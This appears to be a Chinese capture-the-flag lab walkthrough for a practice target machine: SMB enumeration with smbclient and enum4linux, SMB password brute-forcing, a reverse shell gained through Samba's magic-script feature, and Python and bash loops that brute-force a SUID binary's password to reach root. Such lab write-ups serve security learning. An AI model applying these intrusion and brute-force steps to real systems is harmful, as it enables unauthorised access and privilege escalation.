靶机渗透日记
IP端口访问 80 端口目录扫描robots.txt & note.txt访问 crossroads.png ,是一张图片访问 SMBsmbclient -L 192.168.0.133访问 smbshare 提示需要密码对目标上的SMB信息进行枚举enum4linux 192.168.0.133 -A爆破 SMB 密码登录 SMB 服务smbclient //192.168.0.133/
·
-
IP
-
端口
-
访问 80 端口
-
目录扫描
-
robots.txt & note.txt
-
访问 crossroads.png ,是一张图片
-
访问 SMB
smbclient -L 192.168.0.133
访问 smbshare 提示需要密码
-
对目标上的SMB信息进行枚举
enum4linux 192.168.0.133 -A
-
爆破 SMB 密码
-
登录 SMB 服务
smbclient //192.168.0.133/smbshare -U albert
magic script
-
创建 smbscript.sh ,监听端口,上传到 smb 服务器,即可返回shell
-
查看 SUID
执行文件需要输入密码,使用之前得到的密码
-
在 /home/albert 下存在 crossroads.png ,尝试读取其中的信息
-
使用 python 脚本或者 sh 脚本
import subprocess import sys with open("p.txt","r",encoding='ISO.8859.1') as fs: var= fs.read().splitlines() for li in var: var1= li result= subprocess.getoutput("echo %s | ./beroot"%var1) print("testing password "+ var1) if "wrong password!!!" not in str(result): print(result) print("the password is: "+ var1) sys.exit(0)
#!/bin/bash for password in $(cat pass.txt) do echo $password | ./beroot done
-
运行 beroot 会生成root的密码,可以直接切换成root用户
更多推荐
已为社区贡献1条内容
所有评论(0)